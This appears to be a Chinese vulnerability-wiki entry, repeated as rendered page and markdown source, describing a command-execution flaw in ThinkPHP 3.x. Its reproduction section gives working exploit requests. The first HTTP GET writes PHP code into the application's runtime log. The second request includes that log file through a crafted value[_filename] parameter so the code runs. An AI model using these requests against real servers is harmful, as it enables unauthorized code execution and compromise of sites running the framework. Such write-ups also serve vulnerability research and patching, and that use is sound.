fofamini-wiki

登录白背景

源码

thinkphp 3.x版本存在命令执行漏洞

一、漏洞简介

ThinkPHP，是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。thinkphp 3.x版本存在命令执行漏洞

二、影响版本

ThinkPHP 3.x

三、资产测绘

特征

四、漏洞复现

GET /index.php?m=Home&c=Index&a=index&test=--><?=phpinfo();?> HTTP/1.1
Host: 
User-Agent: Java/1.8.0_291
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2

/index.php/?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/24_10_27.log

原文: https://www.yuque.com/xiaokp7/ocvun2/lrpfzz6icllmz9b5

# thinkphp 3.x版本存在命令执行漏洞

# 一、漏洞简介
ThinkPHP，是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。thinkphp 3.x版本存在命令执行漏洞

# 二、影响版本
+ ThinkPHP 3.x

# 三、资产测绘
+ 特征

![1729963450385-ca63c0c5-e3d3-461d-be0a-22c24501e875.png](./img/-mLxY3x_b8H8jUaf/1729963450385-ca63c0c5-e3d3-461d-be0a-22c24501e875-204102.png)

# 四、漏洞复现
```plain
GET /index.php?m=Home&c=Index&a=index&test=--><?=phpinfo();?> HTTP/1.1
Host: 
User-Agent: Java/1.8.0_291
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
```

![1729993088462-23f53ff2-2e0e-4f83-aef2-5035265af5d9.png](./img/-mLxY3x_b8H8jUaf/1729993088462-23f53ff2-2e0e-4f83-aef2-5035265af5d9-407305.png)

```plain
/index.php/?m=Home&c=Index&a=index&value[_filename]=./Application/Runtime/Logs/Home/24_10_27.log
```

![1729993131666-f678826e-2e8d-4005-b4cd-ff21a6875690.png](./img/-mLxY3x_b8H8jUaf/1729993131666-f678826e-2e8d-4005-b4cd-ff21a6875690-077983.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lrpfzz6icllmz9b5>

fofamini-wiki

thinkphp 3.x版本存在命令执行漏洞

一、漏洞简介

<font style="color:rgba(0, 0, 0, 0.84);">二、影响版本</font>

三、资产测绘

四、漏洞复现